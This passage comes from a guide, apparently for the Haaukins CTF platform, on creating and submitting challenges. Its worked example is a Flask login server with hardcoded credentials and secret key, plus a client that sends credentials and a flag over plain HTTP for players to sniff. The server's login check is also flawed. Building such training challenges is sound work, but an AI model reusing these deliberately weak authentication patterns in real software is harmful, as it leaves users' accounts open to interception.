        sha256: cf3985a23be9f117e7c3eac8c9a5ea129ad080dfbd0671f764d2bac4d0e1364c 
      </p>
      <br><br>

      <table>
      <thead>
      <tr class="header">
      <th><strong>Category</strong></th>
      <th><strong>Prefix</strong></th>
      </tr>
      </thead>
      <tbody>
      <tr class="odd">
      <td>Binary</td>
      <td>binary_</td>
      </tr>
      <tr class="even">
      <td>Boot2Root</td>
      <td>b2r_</td>
      </tr>
      <tr class="odd">
      <td>Cryptography</td>
      <td>crypto_</td>
      </tr>
      <tr class="even">
      <td>Forensics</td>
      <td>forensics_</td>
      </tr>
      <tr class="odd">
      <td>Misc</td>
      <td>misc_</td>
      </tr>
      <tr class="even">
      <td>Operational Technology</td>
      <td>ot_</td>
      </tr>
      <tr class="odd">
      <td>Reverse Engineering</td>
      <td>reveng_</td>
      </tr>
      <tr class="even">
      <td>Web Exploitation</td>
      <td>webexp_</td>
      </tr>
      </tbody>
      </table>

      Press the share icon and then the + next to
      <strong>Share link</strong> and paste the link into your challenge
      config and README. Save everything and you are ready to push the things
      to gitlab using the commands bellow.</p>
      <div class="sourceCode" id="cb10"><pre
      class="sourceCode bash"><code class="sourceCode bash"><span id="cb10-1"><a href="#cb10-1" aria-hidden="true" tabindex="-1"></a><span class="fu">git</span> add .</span>
<span id="cb10-2"><a href="#cb10-2" aria-hidden="true" tabindex="-1"></a><span class="fu">git</span> commit <span class="at">-m</span> <span class="st">&quot;Finished my challenge&quot;</span> <span class="co">#Normally you would commit as you go :D</span></span>
<span id="cb10-3"><a href="#cb10-3" aria-hidden="true" tabindex="-1"></a><span class="fu">git</span> push origin development</span></code></pre></div>
      <p>Go to Gitlab and you should see a green button in the top of the
      frontpage saying “create merge request” press that at fill out the
      required information as seen on the picture below. Add Márton Reiter
      and Thomas Mulvad as reviewers, also add Amar if the challenge is for DDC. A reviewer will most likely get back to you
      within 48 hours with feedback or merge it if it looks perfect. The merge
      will then trigger that it will be pushed into Haaukins.</p>
      <figure>
      <img src="./images/mr.png" alt="Merge Request" />
      <figcaption aria-hidden="true">Merge Request</figcaption>
      </figure>
      <h2 id="dynamic-challenge-1">Dynamic challenge</h2>
      <p>This section will describe how to create a dynamic challenge, which
      is best done by creating an actual challenge, to cover as much as
      possible the created challenge will consist of a client communicating
      with a server and the participants will the have to sniff this traffic
      to login. The guide is creates as a part of the GAMESS project, but it
      will be very similar for other scenarios like DDC or general Haaukins
      development as the main difference is the path, see <a
      href="#building-my-first-challenge">Building my first challenge</a> for
      a short introduction to the different paths.</p>
      <p>Lets start by creating a new project from the Challenge-x template
      just like the static challenge.</p>
      <figure>
      <img src="./images/newproject.png" alt="New repo" />
      <figcaption aria-hidden="true">New repo</figcaption>
      </figure>
      <p>For dynamic challenges it is a bit easier to start by developing the
      services that should be running before creating the config files. So
      lets start by creating a client and a server folder within the
      <code>src</code> folder so that the the folder structure looks like seen
      bellow, for demo purposes the server and client will be written in
      python. Other than that we also add a Dockerfile for both the server and
      client.</p>
      <pre><code>├── challenge-config  
│    └── challenge.yml 
├── src
│    ├── client
│    │   ├── requirements.txt
│    │   └── main.py
│    ├── server
│    │   ├── requirements.txt
│    │   └── main.py
├── solution
│    └── solve.py  
├── Dockerfile.server
├── Dockerfile.client
├── .gitlab-ci.yml
└── readme.md</code></pre>
      <p>Now that we have our folder structure we can start developing our
      components. We start by creating our web server which the client login
      to by creating a simple flask app that can handle logins and a front
      page, that shows a login form if not logged in and a site containing the
      flag if logged in.</p>
      <div class="sourceCode" id="cb12"><pre
      class="sourceCode python"><code class="sourceCode python"><span id="cb12-1"><a href="#cb12-1" aria-hidden="true" tabindex="-1"></a><span class="im">from</span> flask <span class="im">import</span> render_template, request, redirect, Flask,url_for, session</span>
<span id="cb12-2"><a href="#cb12-2" aria-hidden="true" tabindex="-1"></a><span class="im">from</span> datetime <span class="im">import</span> datetime, timedelta</span>
<span id="cb12-3"><a href="#cb12-3" aria-hidden="true" tabindex="-1"></a><span class="im">import</span> jwt</span>
<span id="cb12-4"><a href="#cb12-4" aria-hidden="true" tabindex="-1"></a><span class="im">import</span> os</span>
<span id="cb12-5"><a href="#cb12-5" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb12-6"><a href="#cb12-6" aria-hidden="true" tabindex="-1"></a>username <span class="op">=</span> <span class="st">&quot;MrHelmers&quot;</span></span>
<span id="cb12-7"><a href="#cb12-7" aria-hidden="true" tabindex="-1"></a>password <span class="op">=</span> <span class="st">&quot;VoldsomViolinSpiller&quot;</span></span>
<span id="cb12-8"><a href="#cb12-8" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb12-9"><a href="#cb12-9" aria-hidden="true" tabindex="-1"></a>flag <span class="op">=</span> os.getenv(<span class="st">&quot;FLAG&quot;</span>)</span>
<span id="cb12-10"><a href="#cb12-10" aria-hidden="true" tabindex="-1"></a><span class="cf">if</span> <span class="kw">not</span> flag:</span>
<span id="cb12-11"><a href="#cb12-11" aria-hidden="true" tabindex="-1"></a>   flag <span class="op">=</span> <span class="st">&quot;SOMEONE FORGOT TO SET THE FLAG&quot;</span> </span>
<span id="cb12-12"><a href="#cb12-12" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb12-13"><a href="#cb12-13" aria-hidden="true" tabindex="-1"></a>app <span class="op">=</span> Flask(<span class="va">__name__</span>,template_folder<span class="op">=</span><span class="st">&#39;template&#39;</span>)</span>
<span id="cb12-14"><a href="#cb12-14" aria-hidden="true" tabindex="-1"></a>app.secret_key <span class="op">=</span> <span class="st">&#39;a2f468c2-ad68-4d41-ab3c-d6b930312222&#39;</span></span>
<span id="cb12-15"><a href="#cb12-15" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb12-16"><a href="#cb12-16" aria-hidden="true" tabindex="-1"></a><span class="kw">def</span> checkToken() <span class="op">-&gt;</span> <span class="bu">bool</span>:</span>
<span id="cb12-17"><a href="#cb12-17" aria-hidden="true" tabindex="-1"></a>    token <span class="op">=</span> <span class="va">None</span></span>
<span id="cb12-18"><a href="#cb12-18" aria-hidden="true" tabindex="-1"></a>    <span class="cf">if</span> session.get(<span class="st">&quot;jwt&quot;</span>):</span>
<span id="cb12-19"><a href="#cb12-19" aria-hidden="true" tabindex="-1"></a>        token <span class="op">=</span> session[<span class="st">&quot;jwt&quot;</span>]</span>
<span id="cb12-20"><a href="#cb12-20" aria-hidden="true" tabindex="-1"></a>    <span class="cf">else</span>:</span>
<span id="cb12-21"><a href="#cb12-21" aria-hidden="true" tabindex="-1"></a>        <span class="cf">return</span> <span class="va">False</span></span>
<span id="cb12-22"><a href="#cb12-22" aria-hidden="true" tabindex="-1"></a>    <span class="cf">try</span>:</span>
<span id="cb12-23"><a href="#cb12-23" aria-hidden="true" tabindex="-1"></a>        jwt.decode(token, app.config[<span class="st">&#39;SECRET_KEY&#39;</span>])</span>
<span id="cb12-24"><a href="#cb12-24" aria-hidden="true" tabindex="-1"></a>        <span class="cf">return</span> <span class="va">True</span></span>
<span id="cb12-25"><a href="#cb12-25" aria-hidden="true" tabindex="-1"></a>    <span class="cf">except</span>:</span>
<span id="cb12-26"><a href="#cb12-26" aria-hidden="true" tabindex="-1"></a>        <span class="cf">return</span> <span class="va">False</span></span>
<span id="cb12-27"><a href="#cb12-27" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb12-28"><a href="#cb12-28" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb12-29"><a href="#cb12-29" aria-hidden="true" tabindex="-1"></a><span class="at">@app.route</span>(<span class="st">&#39;/&#39;</span>, methods <span class="op">=</span>[<span class="st">&#39;GET&#39;</span>])</span>
<span id="cb12-30"><a href="#cb12-30" aria-hidden="true" tabindex="-1"></a><span class="kw">def</span> index():</span>
<span id="cb12-31"><a href="#cb12-31" aria-hidden="true" tabindex="-1"></a>    <span class="cf">if</span> <span class="kw">not</span> checkToken():</span>
<span id="cb12-32"><a href="#cb12-32" aria-hidden="true" tabindex="-1"></a>        <span class="cf">return</span> redirect(url_for(<span class="st">&#39;login&#39;</span>))</span>
<span id="cb12-33"><a href="#cb12-33" aria-hidden="true" tabindex="-1"></a>    <span class="cf">return</span> render_template(<span class="st">&#39;index.html&#39;</span>, flag<span class="op">=</span>flag)</span>
<span id="cb12-34"><a href="#cb12-34" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb12-35"><a href="#cb12-35" aria-hidden="true" tabindex="-1"></a><span class="at">@app.route</span>(<span class="st">&#39;/login&#39;</span>, methods<span class="op">=</span>[<span class="st">&#39;POST&#39;</span>, <span class="st">&#39;GET&#39;</span>])</span>
<span id="cb12-36"><a href="#cb12-36" aria-hidden="true" tabindex="-1"></a><span class="kw">def</span> login():</span>
<span id="cb12-37"><a href="#cb12-37" aria-hidden="true" tabindex="-1"></a>    error <span class="op">=</span> <span class="va">None</span></span>
<span id="cb12-38"><a href="#cb12-38" aria-hidden="true" tabindex="-1"></a>    <span class="cf">if</span> request.method <span class="op">==</span> <span class="st">&quot;POST&quot;</span>:</span>
<span id="cb12-39"><a href="#cb12-39" aria-hidden="true" tabindex="-1"></a>        auth <span class="op">=</span> request.form</span>
<span id="cb12-40"><a href="#cb12-40" aria-hidden="true" tabindex="-1"></a>        <span class="cf">if</span> <span class="kw">not</span> auth <span class="kw">or</span> <span class="kw">not</span> auth.get(<span class="st">&#39;username&#39;</span>) <span class="kw">or</span> <span class="kw">not</span> auth.get(<span class="st">&#39;password&#39;</span>):</span>
<span id="cb12-41"><a href="#cb12-41" aria-hidden="true" tabindex="-1"></a>            error <span class="op">=</span> <span class="st">&quot;Broken request&quot;</span></span>
<span id="cb12-42"><a href="#cb12-42" aria-hidden="true" tabindex="-1"></a>        <span class="cf">if</span> auth.get(<span class="st">&#39;username&#39;</span>) <span class="op">!=</span> username <span class="kw">and</span> auth.get(<span class="st">&#39;password&#39;</span>) <span class="op">!=</span> password:</span>
<span id="cb12-43"><a href="#cb12-43" aria-hidden="true" tabindex="-1"></a>            error <span class="op">=</span> <span class="st">&#39;Invalid credentials&#39;</span></span>
<span id="cb12-44"><a href="#cb12-44" aria-hidden="true" tabindex="-1"></a>        <span class="cf">else</span>:</span>
<span id="cb12-45"><a href="#cb12-45" aria-hidden="true" tabindex="-1"></a>            token <span class="op">=</span> jwt.encode({</span>
<span id="cb12-46"><a href="#cb12-46" aria-hidden="true" tabindex="-1"></a>                <span class="st">&#39;public_id&#39;</span>: username,</span>
<span id="cb12-47"><a href="#cb12-47" aria-hidden="true" tabindex="-1"></a>                <span class="st">&#39;exp&#39;</span> : datetime.utcnow() <span class="op">+</span> timedelta(minutes <span class="op">=</span> <span class="dv">30</span>)</span>
<span id="cb12-48"><a href="#cb12-48" aria-hidden="true" tabindex="-1"></a>            }, app.config[<span class="st">&#39;SECRET_KEY&#39;</span>])</span>
<span id="cb12-49"><a href="#cb12-49" aria-hidden="true" tabindex="-1"></a>            session[<span class="st">&quot;jwt&quot;</span>] <span class="op">=</span> token</span>
<span id="cb12-50"><a href="#cb12-50" aria-hidden="true" tabindex="-1"></a>            <span class="cf">return</span> redirect(url_for(<span class="st">&#39;index&#39;</span>))    </span>
<span id="cb12-51"><a href="#cb12-51" aria-hidden="true" tabindex="-1"></a>        <span class="cf">return</span> render_template(<span class="st">&#39;login.html&#39;</span>, error<span class="op">=</span>error)</span>
<span id="cb12-52"><a href="#cb12-52" aria-hidden="true" tabindex="-1"></a>    <span class="cf">else</span>:</span>
<span id="cb12-53"><a href="#cb12-53" aria-hidden="true" tabindex="-1"></a>        <span class="cf">return</span> render_template(<span class="st">&#39;login.html&#39;</span>, error<span class="op">=</span>error)</span>
<span id="cb12-54"><a href="#cb12-54" aria-hidden="true" tabindex="-1"></a><span class="cf">if</span> <span class="va">__name__</span> <span class="op">==</span> <span class="st">&quot;__main__&quot;</span>:</span>
<span id="cb12-55"><a href="#cb12-55" aria-hidden="true" tabindex="-1"></a>    app.run()</span></code></pre></div>
      <p>Now that we have the flask app for running on our server we can
      create the <code>Dockerfile.server</code>. From the top we start by
      selecting a python image from dockerhub.com, then we set the directory
      that we will be working from and copy our flask app to this folder and
      install all the required packages. Then we install nginx as this will be
      used to serve the app through gunicorn, add the relevant configs and
      then we run the start script that starts nginx and gunicorn.</p>
      <div class="sourceCode" id="cb13"><pre
      class="sourceCode dockerfile"><code class="sourceCode dockerfile"><span id="cb13-1"><a href="#cb13-1" aria-hidden="true" tabindex="-1"></a><span class="kw">FROM</span> python:3.10.8-alpine3.16</span>
<span id="cb13-2"><a href="#cb13-2" aria-hidden="true" tabindex="-1"></a><span class="kw">WORKDIR</span> /app</span>
<span id="cb13-3"><a href="#cb13-3" aria-hidden="true" tabindex="-1"></a><span class="kw">COPY</span> src/server/flask .</span>
<span id="cb13-4"><a href="#cb13-4" aria-hidden="true" tabindex="-1"></a><span class="kw">RUN</span> <span class="ex">pip3</span> install <span class="at">-r</span> requirements.txt</span>
<span id="cb13-5"><a href="#cb13-5" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb13-6"><a href="#cb13-6" aria-hidden="true" tabindex="-1"></a><span class="kw">RUN</span> <span class="ex">apk</span> add nginx <span class="at">--no-cache</span></span>
<span id="cb13-7"><a href="#cb13-7" aria-hidden="true" tabindex="-1"></a><span class="kw">COPY</span> src/server/confs/nginx.conf /etc/nginx/</span>
<span id="cb13-8"><a href="#cb13-8" aria-hidden="true" tabindex="-1"></a><span class="kw">COPY</span> src/server/confs/breakingfree.hkn.conf /etc/nginx/sites-enabled/</span>
<span id="cb13-9"><a href="#cb13-9" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb13-10"><a href="#cb13-10" aria-hidden="true" tabindex="-1"></a><span class="kw">CMD</span> [<span class="st">&quot;sh&quot;</span>, <span class="st">&quot;start.sh&quot;</span>]</span></code></pre></div>
      <p>Now that we have our server lets create our client that login to our
      server, to highlight that it is the correct packet we will add another
      fields to the form containing a flag.</p>
      <div class="sourceCode" id="cb14"><pre
      class="sourceCode python"><code class="sourceCode python"><span id="cb14-1"><a href="#cb14-1" aria-hidden="true" tabindex="-1"></a><span class="im">import</span> requests</span>
<span id="cb14-2"><a href="#cb14-2" aria-hidden="true" tabindex="-1"></a><span class="im">import</span> subprocess</span>
<span id="cb14-3"><a href="#cb14-3" aria-hidden="true" tabindex="-1"></a><span class="im">import</span> os</span>
<span id="cb14-4"><a href="#cb14-4" aria-hidden="true" tabindex="-1"></a><span class="im">import</span> time</span>
<span id="cb14-5"><a href="#cb14-5" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb14-6"><a href="#cb14-6" aria-hidden="true" tabindex="-1"></a>envflag <span class="op">=</span> os.getenv(<span class="st">&quot;FLAG&quot;</span>)</span>
<span id="cb14-7"><a href="#cb14-7" aria-hidden="true" tabindex="-1"></a>username <span class="op">=</span> <span class="st">&quot;MrHelmers&quot;</span></span>
<span id="cb14-8"><a href="#cb14-8" aria-hidden="true" tabindex="-1"></a>password <span class="op">=</span> <span class="st">&quot;VoldsomViolinSpiller&quot;</span></span>
<span id="cb14-9"><a href="#cb14-9" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb14-10"><a href="#cb14-10" aria-hidden="true" tabindex="-1"></a><span class="kw">def</span> ping_until_up(site):</span>
<span id="cb14-11"><a href="#cb14-11" aria-hidden="true" tabindex="-1"></a>    <span class="cf">while</span> <span class="va">True</span>:</span>
<span id="cb14-12"><a href="#cb14-12" aria-hidden="true" tabindex="-1"></a>        status <span class="op">=</span> subprocess.run([<span class="st">&quot;ping&quot;</span>, <span class="st">&quot;-c&quot;</span>, <span class="st">&quot;3&quot;</span>, site], capture_output<span class="op">=</span><span class="va">True</span>)</span>
<span id="cb14-13"><a href="#cb14-13" aria-hidden="true" tabindex="-1"></a>        <span class="cf">if</span> status.returncode <span class="op">==</span> <span class="dv">0</span>:</span>
<span id="cb14-14"><a href="#cb14-14" aria-hidden="true" tabindex="-1"></a>            <span class="cf">return</span></span>
<span id="cb14-15"><a href="#cb14-15" aria-hidden="true" tabindex="-1"></a>        <span class="bu">print</span>(<span class="st">&quot;Site is down...&quot;</span>)</span>
<span id="cb14-16"><a href="#cb14-16" aria-hidden="true" tabindex="-1"></a>        time.sleep(<span class="dv">3</span>)</span>
<span id="cb14-17"><a href="#cb14-17" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb14-18"><a href="#cb14-18" aria-hidden="true" tabindex="-1"></a><span class="kw">def</span> doLogin():</span>
<span id="cb14-19"><a href="#cb14-19" aria-hidden="true" tabindex="-1"></a>    <span class="bu">print</span>(<span class="st">&quot;Login&quot;</span>)</span>
<span id="cb14-20"><a href="#cb14-20" aria-hidden="true" tabindex="-1"></a>    payload <span class="op">=</span> {<span class="st">&quot;username&quot;</span>: username, <span class="st">&quot;password&quot;</span>:password,<span class="st">&quot;flag&quot;</span>:envflag}</span>
<span id="cb14-21"><a href="#cb14-21" aria-hidden="true" tabindex="-1"></a>    respones <span class="op">=</span> requests.post(<span class="st">&quot;http://breakingfree.hkn/login&quot;</span>, data<span class="op">=</span>payload,verify<span class="op">=</span><span class="va">False</span>,allow_redirects<span class="op">=</span><span class="va">False</span>)</span>
<span id="cb14-22"><a href="#cb14-22" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb14-23"><a href="#cb14-23" aria-hidden="true" tabindex="-1"></a>ping_until_up(<span class="st">&quot;breakingfree.hkn&quot;</span>)</span>
<span id="cb14-24"><a href="#cb14-24" aria-hidden="true" tabindex="-1"></a><span class="cf">while</span> <span class="va">True</span>:</span>
<span id="cb14-25"><a href="#cb14-25" aria-hidden="true" tabindex="-1"></a>    doLogin()</span>
<span id="cb14-26"><a href="#cb14-26" aria-hidden="true" tabindex="-1"></a>    time.sleep(<span class="dv">10</span>)</span></code></pre></div>
      <p>As we have a case where one container depends on another we need to
      check if the server is alive, as Haaukins does not support the Docker
      tag depends_on, a simple way of doing this is by sending pings using the
      <code>ping_until_up()</code> function. Then we can start the proccess of
      sending logins, it is worth noting that allow redirrects is set to
      false, this is done to prevent flag leaks from the server.</p>
      <p>To test this locally we can use <code>docker compose</code> so lets
      create a docker compose file that has our two containers. We give our
      server the domainname as the service name, as docker internals will then
      handle DNS almost as if it was the acutal Haaukins runnning the
      container. Now we can test how our containers behaive if the other one
      is offline. As it is only the client that depends on the server we
      should test how it behaives by just bringing that one up using
      <code>docker compose up client --build</code> is this case it will write
      <code>Site is down...</code> every 3 seconds until we bring the server
      up using <code>docker compose up breakingfree.hkn --build</code>.</p>
      <pre class="docker-compose"><code>version: &quot;3&quot;
      services:
        breakingfree.hkn:
          build:
            context: .
            dockerfile: Dockerfile.server
          environment:
            - FLAG=HKN{server-test-flag}
        client:
          build:
            context: .
            dockerfile: Dockerfile.client
          environment:
              - FLAG=HKN{client-test-flag}</code></pre>
      <p>Now that we have conducted a local test we are ready to create the
      <code>gitlab_ci.yml</code> file that will build our containers and push
      the challenge config to haaukins. As we have two containers for this
      challenge we have four lines in script section of the
      <code>docker-push-to-gitlab-registery</code> pipeline, first we build
      the server image specifying our server Dockerfile and tagging it with
      the full name of the repository and <code>:server</code> to tell the
      docker registry that it is the server image. After that we push it to
      the registry, and then we do the same for the client image only changing
      <code>:server</code> to <code>:client</code></p>
      <div class="sourceCode" id="cb16"><pre
      class="sourceCode yml"><code class="sourceCode yaml"><span id="cb16-1"><a href="#cb16-1" aria-hidden="true" tabindex="-1"></a><span class="fu">docker-push-to-gitlab-registery</span><span class="kw">:</span></span>
<span id="cb16-2"><a href="#cb16-2" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">image</span><span class="kw">:</span><span class="at"> docker:latest</span></span>
<span id="cb16-3"><a href="#cb16-3" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">stage</span><span class="kw">:</span><span class="at"> build</span></span>
<span id="cb16-4"><a href="#cb16-4" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">services</span><span class="kw">:</span></span>
<span id="cb16-5"><a href="#cb16-5" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> docker:dind</span></span>
<span id="cb16-6"><a href="#cb16-6" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">before_script</span><span class="kw">:</span></span>
<span id="cb16-7"><a href="#cb16-7" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY</span></span>
<span id="cb16-8"><a href="#cb16-8" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">script</span><span class="kw">:</span></span>
<span id="cb16-9"><a href="#cb16-9" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> docker build --pull -f Dockerfile.server -t &quot;$GITLAB_REGISTERY/haaukins/games/aau/breaking-free:server&quot; .</span></span>
<span id="cb16-10"><a href="#cb16-10" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> docker push &quot;$GITLAB_REGISTERY/haaukins/games/aau/breaking-free:server&quot;</span></span>
<span id="cb16-11"><a href="#cb16-11" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> docker build --pull -f Dockerfile.client -t &quot;$GITLAB_REGISTERY/haaukins/games/aau/breaking-free:client&quot; .</span></span>
<span id="cb16-12"><a href="#cb16-12" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> docker push &quot;$GITLAB_REGISTERY/haaukins/games/aau/breaking-free:client&quot;</span></span>
<span id="cb16-13"><a href="#cb16-13" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">only</span><span class="kw">:</span></span>
<span id="cb16-14"><a href="#cb16-14" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> main</span></span>
<span id="cb16-15"><a href="#cb16-15" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb16-16"><a href="#cb16-16" aria-hidden="true" tabindex="-1"></a><span class="co"># Same as static challenges</span></span>
<span id="cb16-17"><a href="#cb16-17" aria-hidden="true" tabindex="-1"></a><span class="fu">push-to-challenge-service</span><span class="kw">:</span></span>
<span id="cb16-18"><a href="#cb16-18" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">image</span><span class="kw">:</span><span class="at"> ubuntu:latest</span></span>
<span id="cb16-19"><a href="#cb16-19" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">stage</span><span class="kw">:</span><span class="at"> build</span></span>
<span id="cb16-20"><a href="#cb16-20" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">before_script</span><span class="kw">:</span></span>
<span id="cb16-21"><a href="#cb16-21" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> apt-get update -y</span></span>
<span id="cb16-22"><a href="#cb16-22" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> apt-get install -y wget </span></span>
<span id="cb16-23"><a href="#cb16-23" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> apt-get install -y zip </span></span>
<span id="cb16-24"><a href="#cb16-24" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> wget https://github.com/mrtrkmnhub/cservice-cli/releases/download/1.0.0/cservice-cli_1.0.0_linux_64-bit.zip </span></span>
<span id="cb16-25"><a href="#cb16-25" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> unzip cservice-cli_1.0.0_linux_64-bit.zip </span></span>
<span id="cb16-26"><a href="#cb16-26" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> mv cservice-cli_1.0.0_linux_64-bit/main .</span></span>
<span id="cb16-27"><a href="#cb16-27" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> chmod +x ./main</span></span>
<span id="cb16-28"><a href="#cb16-28" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">script</span><span class="kw">:</span><span class="at"> </span></span>
<span id="cb16-29"><a href="#cb16-29" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> ./main</span></span>
<span id="cb16-30"><a href="#cb16-30" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">only</span><span class="kw">:</span><span class="at"> </span></span>
<span id="cb16-31"><a href="#cb16-31" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> main</span></span>
<span id="cb16-32"><a href="#cb16-32" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">variables</span><span class="kw">:</span></span>
<span id="cb16-33"><a href="#cb16-33" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">ENDPOINT</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;$ENDPOINT&quot;</span></span>
<span id="cb16-34"><a href="#cb16-34" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">PORT</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;$PORT&quot;</span></span>
<span id="cb16-35"><a href="#cb16-35" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">AUTH_KEY</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;$AUTH_KEY&quot;</span></span>
<span id="cb16-36"><a href="#cb16-36" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">SIGN_KEY</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;$SIGN_KEY&quot;</span></span></code></pre></div>
      <p>Now that we have the paths for our docker images from the
      <code>gitlab_ci.yml</code> file we can build our challenge config
      file.</p>
      <div class="sourceCode" id="cb17"><pre
      class="sourceCode yml"><code class="sourceCode yaml"><span id="cb17-1"><a href="#cb17-1" aria-hidden="true" tabindex="-1"></a><span class="fu">name</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;Breaking Free&quot;</span><span class="co"> # Insert challenge name here, this is the name found in the admin panel</span></span>
<span id="cb17-2"><a href="#cb17-2" aria-hidden="true" tabindex="-1"></a><span class="fu">tag</span><span class="kw">:</span><span class="at"> fr_breaking-free</span><span class="co"> # create challenge tag from name and prefix from</span></span>
<span id="cb17-3"><a href="#cb17-3" aria-hidden="true" tabindex="-1"></a><span class="fu">static</span><span class="kw">:</span><span class="at"> </span><span class="ch">false</span><span class="co"> # This should be set to true as it is &quot;just&quot; an artifact people should download</span></span>
<span id="cb17-4"><a href="#cb17-4" aria-hidden="true" tabindex="-1"></a><span class="fu">secret</span><span class="kw">:</span><span class="at"> </span><span class="ch">true</span></span>
<span id="cb17-5"><a href="#cb17-5" aria-hidden="true" tabindex="-1"></a><span class="fu">od</span><span class="kw">: </span><span class="ch">|</span><span class="co"> # Insert content of readme below</span></span>
<span id="cb17-6"><a href="#cb17-6" aria-hidden="true" tabindex="-1"></a>    # Breaking Free</span>
<span id="cb17-7"><a href="#cb17-7" aria-hidden="true" tabindex="-1"></a>    ... </span>
<span id="cb17-8"><a href="#cb17-8" aria-hidden="true" tabindex="-1"></a>      </span>
<span id="cb17-9"><a href="#cb17-9" aria-hidden="true" tabindex="-1"></a><span class="fu">instance</span><span class="kw">:</span></span>
<span id="cb17-10"><a href="#cb17-10" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">image</span><span class="kw">:</span><span class="at"> registry.gitlab.com/haaukins/games/aau/breaking-free:server</span><span class="co"> #we start with the server image</span></span>
<span id="cb17-11"><a href="#cb17-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">dns</span><span class="kw">:</span><span class="co"> # set the dns record for the server</span></span>
<span id="cb17-12"><a href="#cb17-12" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> breakingfree.hkn</span></span>
<span id="cb17-13"><a href="#cb17-13" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">type</span><span class="kw">:</span><span class="at"> A</span></span>
<span id="cb17-14"><a href="#cb17-14" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">flags</span><span class="kw">:</span></span>
<span id="cb17-15"><a href="#cb17-15" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="kw">-</span><span class="at"> </span><span class="fu">tag</span><span class="kw">:</span><span class="at"> breaking-free-0</span><span class="co"> # Challenge tag without prefix and with a number</span></span>
<span id="cb17-16"><a href="#cb17-16" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">name</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;Breaking free weblogin&quot;</span><span class="co"> # Name participants sees</span></span>
<span id="cb17-17"><a href="#cb17-17" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">env</span><span class="kw">:</span><span class="at"> FLAG</span><span class="co"> # The environment varible your code reads the flag from</span></span>
<span id="cb17-18"><a href="#cb17-18" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">points</span><span class="kw">:</span><span class="at"> </span><span class="dv">15</span><span class="co"> # Point as described in the point section</span></span>
<span id="cb17-19"><a href="#cb17-19" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">category</span><span class="kw">:</span><span class="at"> Web exploitation</span><span class="co"> # Category of the challenge</span></span>
<span id="cb17-20"><a href="#cb17-20" aria-hidden="true" tabindex="-1"></a><span class="fu">        td</span><span class="kw">: </span><span class="ch">|</span><span class="co"> # Description that the participants sees ending with a download link</span></span>
